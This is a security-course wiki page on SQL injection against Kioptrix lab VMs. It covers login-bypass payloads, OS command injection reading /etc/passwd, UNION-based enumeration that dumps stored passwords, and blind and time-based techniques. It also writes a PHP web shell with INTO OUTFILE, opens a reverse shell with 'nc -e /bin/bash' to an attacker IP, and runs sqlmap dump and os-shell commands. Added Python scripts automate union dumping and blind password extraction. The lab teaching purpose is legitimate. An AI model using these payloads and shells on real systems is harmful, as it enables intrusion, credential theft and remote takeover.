SQL Injection - Paiet/SEC-335 GitHub Wiki
SQL-Injection (Example VMs: Kioptrix 1.1, 1.2, 1.3)

- SQL-Injection is the art of executing arbitrary SQL commands through the input of a vulnerable system
- Web site asks you for input
- That input becomes part of a SQL statement
  - Problem comes from no input validation or boundary checks (the input is concatenated straight into the query text instead of being passed as a bound parameter)
  - This allows you to add arbitrary SQL commands as part of your input
- This could be through different means
  - Input boxes
    - username/password
    - input fields
  - Directly in the URL (query-string parameters such as `id=1`)
DEMO

- kioptrix 1.1
  - Username: `' OR 1=1 #`
  - Command injection (this one is OS command injection, not SQL: the `;` chains a second shell command onto the address being pinged): `127.0.0.1;cat /etc/passwd`
- kioptrix 1.3
  - Found 2 users using dirb
    ```
    dirb http://kioptrix1-3.com /usr/share/wordlists/dirb/big.txt
    ```
    - /john
    - /robert
  - Password: `' OR 1=1 #`
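The login bypass from the demo, reproduced as an added example (not the wiki's or the Kioptrix VMs' own code) against a constructed SQLite table, with the parameterized version beside it. The `users` table and its rows are made up. SQLite has no `#` line comment, so MySQL's `' OR 1=1 #` is written `' OR 1=1 -- ` here; the effect on the query is the same.

```python
import sqlite3

# Constructed stand-in for the Kioptrix login form (added example, not the VM's PHP).
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'hunter2');   -- constructed sample rows
        INSERT INTO users VALUES ('john',  'letmein');
    """)
    return db

def effective_query(username, password):
    """The SQL text the vulnerable login actually runs, so the payload's effect is
    visible: the quote closes the literal, OR 1=1 makes the WHERE true for every
    row, and `-- ` comments out the rest (MySQL also accepts `#` for this)."""
    return ("SELECT username FROM users WHERE username='" + username +
            "' AND password='" + password + "'")

def vulnerable_login(db, username, password):
    """Concatenates raw input into the query, the bug the page describes.
    Returns the first matched username, or None when no row matches."""
    row = db.execute(effective_query(username, password)).fetchone()
    return row[0] if row else None

def safe_login(db, username, password):
    """Same query with bound parameters: the driver passes the input as data, so a
    quote in it can never terminate the string literal or start a new clause."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    payload = "' OR 1=1 -- "
    print(effective_query(payload, "anything"))
    print("vulnerable, payload in username:", vulnerable_login(db, payload, "anything"))
    print("vulnerable, payload in password:", vulnerable_login(db, "john", payload))
    print("parameterized, same payload:    ", safe_login(db, payload, "anything"))
    print("parameterized, real credentials:", safe_login(db, "john", "letmein"))
```

With the payload in the password field (the Kioptrix 1.3 variant) the WHERE clause becomes `username='john' AND password='' OR 1=1`, and because `AND` binds tighter than `OR` the `OR 1=1` still matches every row, so the first user in the table is returned regardless of which username was typed.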
Error-Based

- Website returns SQL error messages
- Attacker uses that information to craft useful SQL injections
- Is this server vulnerable?
  - URL: http://kioptrix3.com/gallery/gallery.php?id=1&sort=filename#photos
  - A numeric parameter such as `id=1` is a likely injection point
- Test server for unsanitized input
  - Add a single or double quote to the end of the parameter: `id=1'`
  - This is technically a SQL injection (the quote breaks the syntax of the query the input lands in)
  - Hopefully this produces an error message
  - If YES, then proceed with column enumeration
  - If NO, then the site may not be susceptible
    - Still try Blind SQL-Injection
- Column Enumeration
  - We want to discover the areas in the web page that we can use to display table and column data
  - We do this by discovering the EXACT number of columns being used by the original query (a `union` only works when both selects return the same number of columns)
  - Enter the `order by` statement:
    ```
    http://kioptrix3.com/gallery/gallery.php?id=1 order by 1
    ```
  - Continually increase the `order by` number until you get an error
    - There are exactly "error-number minus 1" columns
  - If no errors are being produced
    - Try `order by 1 -- ` (the comment discards whatever the application appends after your input; MySQL needs a space after `--`, or use `#` instead)
    - Then increase the number until an error or a change in the page occurs
  - Enter the `union all select` statement:
    ```
    http://kioptrix3.com/gallery/gallery.php?id=1 union all select 1,2,3,4,5,6
    ```
    - Helps us find which columns will display DB info on the page
    - Look for the numbers 1 through 6 somewhere on the web page
    - Here we see that numbers 2 and 3 are visible
    - So we will use those columns to output DB info
    - If the page only renders the first row, use an id that matches nothing (e.g. `id=-1 union all select ...`) so the injected row is the one displayed
    ```
    union all select 1,@@version,user(),4,5,6
    ```
    - Displays DB version and user info

Table Enumeration
```
union all select 1,table_name,3,4,5,6 from information_schema.tables
```
- `information_schema.tables` lists every table the DB user can see, one injected row per table

Column Enumeration
```
/gallery/gallery.php?id=1 union all select 1,column_name,3,4,5,6 from information_schema.columns where table_name='dev_accounts'
```

Read Column Info
```
union all select 1,username,password,4,5,6 from dev_accounts
```
- We now see the usernames and passwords
Blind SQL Injection

- Not all injectable web sites return errors (most don't)
- So we throw some injection attacks at it and see if we get any results
- Try a GOOD (always true) statement like `and 1=1;#`
- Try a BAD (always false) statement like `and 1=2;#`
- Look for ANY change in the site's appearance
  - Changes are an indication of successful injections
  - A reliable true/false difference is an oracle: any question you can phrase as a condition (a table exists, a character of a password equals `a`) can be answered one bit at a time
- If this doesn't work then try `sleep()`:
  ```
  http://kioptrix3.com/gallery/gallery.php?id=1-sleep(5)
  ```
  - If the site "hangs" then the `sleep()` injection worked
  - We can use that as a "WORKED/FAILED" indicator (`sleep(5)` returns 0, so `1-sleep(5)` is still `1` and the page renders normally, just 5 seconds late)
  - Any good statement will hang the site for 5 seconds
  - Any bad statement will not hang the site
  - `sleep()` is MySQL-specific; PostgreSQL uses `pg_sleep()` and MSSQL `WAITFOR DELAY`
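The error-based column enumeration above and the blind true/false extraction, as one added example (not the wiki's or Kioptrix's code) against a constructed SQLite stand-in for `gallery.php?id=`. The `photos` and `dev_accounts` tables, the user `alice`, her password and the rendered page format are all made up. SQLite has no `information_schema`, `sleep()` or `#` comment, so the example shows the `order by` count, the `union` marker detection, a `union` dump of the two visible columns, and boolean-blind extraction through the `and <condition>` oracle; the same requests work unchanged against MySQL except where noted in the comments.

```python
import re
import sqlite3
import string

# Constructed stand-in for gallery.php (added example). Tables and rows are made up.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE photos(id INTEGER, filename TEXT, title TEXT,
                            description TEXT, hits INTEGER, owner TEXT);
        INSERT INTO photos VALUES (1, 'img.jpg', 'Sunset', 'sample', 10, 'admin');
        CREATE TABLE dev_accounts(id INTEGER, username TEXT, password TEXT);
        INSERT INTO dev_accounts VALUES (1, 'alice', 'S3cret!');
    """)
    return db

def gallery(db, id_param):
    """Vulnerable endpoint: id is pasted into the query unquoted, as on the page.
    Renders only filename and title (columns 2 and 3), or the DB error text."""
    sql = ("SELECT id, filename, title, description, hits, owner "
           "FROM photos WHERE id=" + id_param)
    try:
        rows = db.execute(sql).fetchall()
    except sqlite3.Error as e:
        return "SQL error: " + str(e)
    return "\n".join(f"Photo: {r[1]} {r[2]}" for r in rows)

def count_columns(db, max_cols=20):
    """`order by N` until the page errors or changes: N-1 is the column count."""
    baseline = gallery(db, "1")
    for n in range(1, max_cols + 1):
        page = gallery(db, f"1 order by {n}")
        if page.startswith("SQL error") or page != baseline:
            return n - 1
    raise RuntimeError("no error or change up to max_cols")

def visible_columns(db, ncols):
    """`union all select 1,2,...,N`; the numbers that show up on the page mark the
    columns that render. id=-1 matches no real row so only the injected row shows."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    page = gallery(db, f"-1 union all select {markers}")
    return [i for i in range(1, ncols + 1) if re.search(rf"\b{i}\b", page)]

def dump_via_union(db, ncols, col_a, col_b, expr_a, expr_b, from_clause):
    """Puts two expressions into the visible columns (e.g. username,password from
    dev_accounts) and parses the rendered rows back out. On MySQL the same call
    with table_name / information_schema.tables enumerates tables."""
    cols = ["NULL"] * ncols
    cols[col_a - 1], cols[col_b - 1] = expr_a, expr_b
    page = gallery(db, f"-1 union all select {','.join(cols)} {from_clause}")
    return [line[len("Photo: "):].split(" ", 1) for line in page.splitlines()]

def blind_oracle(db, condition):
    """Boolean-blind check: `id=1 and <cond>` renders the photo only when true.
    An error page also counts as false, so broken conditions never yield a hit."""
    return gallery(db, f"1 and {condition}") == gallery(db, "1")

def blind_extract(db, subquery, charset=string.ascii_letters + string.digits + "!@#$%^&*_-.",
                  max_len=32):
    """Recovers a string one character at a time with the oracle. substr() is the
    SQLite name (MySQL: substring()). Note MySQL's default collation compares
    case-insensitively, so there you would compare ascii() values instead."""
    out = ""
    for pos in range(1, max_len + 1):
        for c in charset:
            if blind_oracle(db, f"substr(({subquery}),{pos},1)='{c}'"):
                out += c
                break
        else:
            return out  # no character matched: end of the string
    return out

if __name__ == "__main__":
    db = make_db()
    n = count_columns(db)
    vis = visible_columns(db, n)
    print("columns:", n, "visible:", vis)
    print("union dump:", dump_via_union(db, n, vis[0], vis[1],
                                        "username", "password", "from dev_accounts"))
    print("blind 1=1 / 1=2:", blind_oracle(db, "1=1"), blind_oracle(db, "1=2"))
    print("blind extract:", blind_extract(db, "select password from dev_accounts limit 1"))
```

The blind path issues one request per candidate character per position, which is why it is the fallback and not the first choice; against a real target the charset order and a binary search on `ascii()` cut that cost, and a time-based `sleep()` oracle plugs into `blind_oracle` in place of the page comparison.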
Read/Write/Code Execution

- Read a local file with `load_file("/path/to/file")`
  ```
  union all select 1,load_file("/etc/passwd"),3,4,5,6
  ```
  - Requires the FILE privilege for the DB user; if the file is unreadable or blocked by `secure_file_priv`, `load_file()` returns NULL rather than an error
- Write a local file with `into OUTFILE '/path/to/file'`
  ```
  union all select 1,"<?php echo shell_exec($_GET['cmd']);?>",3,4,5,6 into OUTFILE '/tmp/backdoor.php' --
  ```
  - You will want to write exploit code to the web site's directory (a path under the web root that the MySQL user can write to) so that you can browse to that exploit page and run the code; `/tmp` is not reachable through the browser
  - Also needs the FILE privilege, and `into OUTFILE` refuses to overwrite an existing file
- Execute Code
  - Start a listener on the attacker machine first (`nc -nvlp port`)
  - Browse to the exploit page and define the command parameter (URL-encode the spaces if the browser does not do it for you)
    - http://kioptrix3.com/backdoor.php?cmd=nc -nv attacker-ip port -e /bin/bash
    - http://kioptrix3.com/backdoor.php?cmd=nc.exe -nv attacker-ip port -e cmd.exe (Windows target)

sqlmap

- Automate all this using `sqlmap`
  ```
  sqlmap -u http://kioptrix3.com --crawl=1
  ```
  - Crawls the site to depth 1 and searches for SQL injection points
  - Injection points displayed in the PAYLOAD area of the output
  ```
  sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --dbms=mysql --dump --threads=5
  ```
  - `-u` (injection point) `--dbms` (force db type) `--threads` (max number of concurrent HTTP requests)
  - Dumps table entries
  ```
  sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --dbms=mysql --os-shell
  ```
  - `--os-shell` (attempts to obtain a remote shell from the target; on a MySQL web target this relies on the same file-write primitive as `into OUTFILE` above, so the same FILE privilege and writable web-root requirements apply)
  - From here you just issue commands
    ```
    ifconfig
    nc -nv attacker-ip port
    ```